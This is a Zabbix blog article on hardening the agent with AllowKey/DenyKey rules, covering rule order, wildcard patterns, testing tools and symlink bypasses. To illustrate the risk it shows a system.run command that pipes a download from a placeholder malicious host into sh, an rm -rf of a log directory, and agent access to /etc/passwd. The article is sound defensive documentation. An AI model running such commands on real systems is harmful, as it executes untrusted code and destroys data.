Blacklist and whitelist support for agent-side metrics in Zabbix 5.0

Tikhon Uskov, Integration Engineer, Zabbix

Data security issues

Zabbix 5.0 has a new feature that lets you improve security in systems that use Zabbix Agent, and it replaces the old parameter EnableRemoteCommands.

The security improvements for agent-based systems stem from the fact that an agent can perform a large number of potentially dangerous actions.

  • The agent can collect almost any information, including confidential or potentially dangerous data, from configuration files, log files, password files, or any other files.

For example, using the zabbix_get utility you can access the list of users, their home directories, password files, and so on.

Accessing data using the zabbix_get utility

NOTE. Data can be retrieved only if the agent has read permission on the corresponding file. But, for example, the file /etc/passwd is readable by all users.

  • The agent can also execute potentially dangerous commands. For example, the key system.run[] allows you to execute any remote command on network nodes, including running scripts from the Zabbix web interface that also execute commands on the agent side.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • On Linux, the agent runs by default without root privileges, whereas on Windows it runs as a service under the System account and has unrestricted access to the file system. Therefore, if no changes are made to the Zabbix Agent parameters after installation, the agent has access to the registry and the file system, and can execute WMI queries.

In earlier versions, the parameter EnableRemoteCommands=0 only allowed you to disable metrics with the key system.run[] and the running of scripts from the web interface, but there was no way to restrict access to individual files, to allow or disable individual keys installed with the agent, or to limit the use of individual parameters.

Using the EnableRemoteCommands parameter in earlier versions of Zabbix

AllowKey/DenyKey

Zabbix 5.0 helps protect against such unauthorized access by providing whitelists and blacklists for allowing and denying metrics on the agent side.

In Zabbix 5.0 all keys, including system.run[], are enabled, and two new agent configuration options have been added:

AllowKey=<pattern> - allowed checks;

DenyKey=<pattern> - denied checks;

where pattern is a key name expression with parameters that uses the metacharacter (*).

The AllowKey and DenyKey parameters let you allow or deny individual metrics based on a specific pattern. Unlike other configuration parameters, the number of AllowKey/DenyKey parameters is not limited. This lets you define exactly what the agent can do in the system by building a tree of checks (executable keys), where the order in which they are written plays a very important role.

Order of rules

Rules are checked in the order in which they are entered in the configuration file. A key is checked against the rules until the first match, and as soon as the key of the data item matches a pattern, it is allowed or denied. After that, rule checking stops and the remaining rules are ignored.

Therefore, if an item matches both an allow rule and a deny rule, the result depends on which rule comes first in the configuration file.

2 different rules with the same pattern and the key vfs.file.size[/tmp/file]

Order for using the AllowKey/DenyKey parameters:

  1. exact rules,
  2. general rules,
  3. prohibitive rule.

For example, if you need access to files in a specific folder, you must first allow access to them and then deny everything that does not fall under the permissions you set. If the deny rule is applied first, access to the folder will be denied.

Correct order

If you need to allow 2 utilities to run via system.run[], and the deny rule is specified first, the utilities will not be launched, because the first pattern will always match any key and the subsequent rules will be ignored.

Incorrect order

Patterns

Basic rules

A pattern is an expression with wildcards. The wildcard character (*) matches any number of any characters in a given position. Wildcards can be used both in the key name and in the parameters. For example, you can specify the first parameter strictly as text and the next one as a wildcard.

Parameters must be enclosed in square brackets [].

  • system.run[* - wrong
  • vfs.file*.txt] - wrong
  • vfs.file.*[*] - right

Examples of using wildcards.

  1. In the key name and in the parameter. In this case, the pattern does not match a similar key that contains no parameters, since the pattern states that we want a certain ending of the key name and a certain set of parameters.
  2. If the pattern does not use square brackets, it allows all keys that contain no parameters and denies all keys that contain the specified parameter.
  3. If the key is written in full and the parameters are specified as a wildcard, it will match any similar key with any parameters and will not match the key without square brackets, that is, it will be allowed or denied.

Rules for filling in parameters.

  • If a key is intended to be used with parameters, the parameters must be specified in the configuration file. Parameters must be specified as a metacharacter. You need to carefully deny access to any file and consider what information the metric can return under different spellings, with and without parameters.

Specifics of writing keys with parameters

  • If a key is specified with parameters, but the parameters are optional and given as a metacharacter, the key without parameters will be allowed. For example, if you want to disable the collection of CPU load information and specify that the key system.cpu.load[*] should be denied, do not forget that the key without parameters will return the average load value.

Rules for filling in parameters
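The first-match ordering and the wildcard rules described above can be checked offline with a small model. This is an added example, not code from the article or from Zabbix: it treats the whole key as one string, which is a simplification, and the rule sets and the commands `free` and `ipcs -l` are constructed for illustration.

```python
import re

def valid_pattern(pattern):
    """Bracket rule from the article: parameters must be enclosed in [ ]."""
    if "[" not in pattern:
        return "]" not in pattern
    return pattern.count("[") == 1 and pattern.count("]") == 1 and pattern.endswith("]")

def parse_rules(conf_text):
    """Return (action, pattern) pairs in file order; the order is significant."""
    rules = []
    for line in conf_text.splitlines():
        name, _, pattern = line.strip().partition("=")
        name, pattern = name.strip(), pattern.strip()
        if name not in ("AllowKey", "DenyKey"):
            continue  # blank lines, comments and other agent parameters
        if not valid_pattern(pattern):
            raise ValueError(f"malformed pattern: {pattern!r}")
        rules.append(("allow" if name == "AllowKey" else "deny", pattern))
    return rules

def matches(pattern, key):
    """'*' matches any run of characters; every other character is literal."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, key, flags=re.DOTALL) is not None

def decide(rules, key):
    """The first matching rule wins; later rules are never consulted."""
    for action, pattern in rules:
        if matches(pattern, key):
            return action
    return "allow"  # assumption: a key matched by no rule stays allowed

# Constructed rule sets (not copied from the article's screenshots).
CORRECT = """
AllowKey=system.run[free]
AllowKey=system.run[ipcs -l]
DenyKey=system.run[*]
"""
WRONG = """
DenyKey=system.run[*]
AllowKey=system.run[free]
AllowKey=system.run[ipcs -l]
"""

def audit(conf_text, keys):
    """Map each key to the decision the rule set produces for it."""
    rules = parse_rules(conf_text)
    return {key: decide(rules, key) for key in keys}
```

Running `audit` over the same keys with both rule sets shows the allow rules becoming dead code once the broad deny rule precedes them, and `DenyKey=system.cpu.load[*]` leaving the parameterless key untouched.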

Notes

Configuration

  • Some rules cannot be changed by the user, for example, discovery rules or auto-registration rules. AllowKey/DenyKey rules do not affect the following parameters:
    - HostnameItem
    - HostMetadataItem
    - HostInterfaceItem

NOTE. If an administrator disables a key, then when it is queried Zabbix gives no information about why the metric or key falls into the 'NOTSUPPORTED' category. Information about restrictions on executing remote commands is also not shown in the agent log files. This is for security reasons, but it can complicate debugging if a metric falls into the unsupported category for some other reason.

  • Do not rely on any particular order for including external configuration files (for example, alphabetical order).

Command-line utilities

After setting up the rules, you need to make sure that everything is configured correctly.

You can use one of three options:

  • Add the metric to Zabbix.
  • Test with zabbix_agentd. The Zabbix agent with the --print (-p) option shows all keys (which are allowed by default) except those not allowed by the configuration. With the --test (-t) option, a denied key returns 'Unsupported item key'.
  • Test with zabbix_get. Using zabbix_get with the -k option returns 'ZBX_NOTSUPPORTED: Unknown metric'.

Allow or deny

You can deny access to a file and then verify, for example with the zabbix_get utility, that access to the file is denied.

NOTE. Quotes in the parameter are ignored.

In this case, access to such a file may still be possible via a different path. For example, if a symlink leads to it.

It is recommended to check the various ways the specified rules can be applied and to consider the possibilities for bypassing the prohibitions.
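One way to audit the symlink case mentioned above is to list every symlink in the directories the agent can read that resolves to a file you have denied by path. This is an added example, not part of the original article; the function names and the temporary directory tree are constructed for the demonstration.

```python
import os
import tempfile

def find_aliases(denied_path, search_roots):
    """Return symlink paths under search_roots that resolve to denied_path."""
    target = os.path.realpath(denied_path)
    aliases = []
    for root in search_roots:
        # followlinks=False: report the links themselves, do not descend into them
        for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
            for name in dirnames + filenames:
                path = os.path.join(dirpath, name)
                if os.path.islink(path) and os.path.realpath(path) == target:
                    aliases.append(path)
    return sorted(aliases)

def demo():
    """Build a constructed directory tree and report aliases of the denied file."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.conf")   # stands in for the denied file
        with open(secret, "w") as fh:
            fh.write("password=example\n")
        pub = os.path.join(tmp, "pub")
        os.mkdir(pub)
        os.symlink(secret, os.path.join(pub, "link.conf"))      # alias of the denied file
        with open(os.path.join(pub, "other.conf"), "w") as fh:  # unrelated regular file
            fh.write("x\n")
        found = find_aliases(secret, [tmp])
        return [os.path.relpath(p, tmp) for p in found]
```

Each path it reports needs its own DenyKey rule, or the link should be removed, because a rule written for the original path does not match the alias.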

Questions and answers

Question. Why was such a complex pattern scheme with its own language chosen to describe rules, permissions and prohibitions? Why was it not possible to use, for example, the regular expressions that Zabbix uses?

Answer. This is a matter of regex performance, since there is usually only one agent and it checks a large number of metrics. Regex is a rather heavy operation, and we cannot check thousands of metrics this way. Wildcards are a universal, widely used and simple solution.

Question. Aren't the Include files included in alphabetical order?

Answer. As far as I know, it is practically impossible to predict the order in which rules will be applied if you spread them across different files. I recommend collecting all AllowKey/DenyKey rules in one Include file, because they interact with each other, and including that file.

Question. In Zabbix 5.0 the 'EnableRemoteCommands=' option is missing from the configuration file, and only AllowKey/DenyKey are available?

Answer. Yes, that's right.

Thank you for your attention!

source: www.habr.com
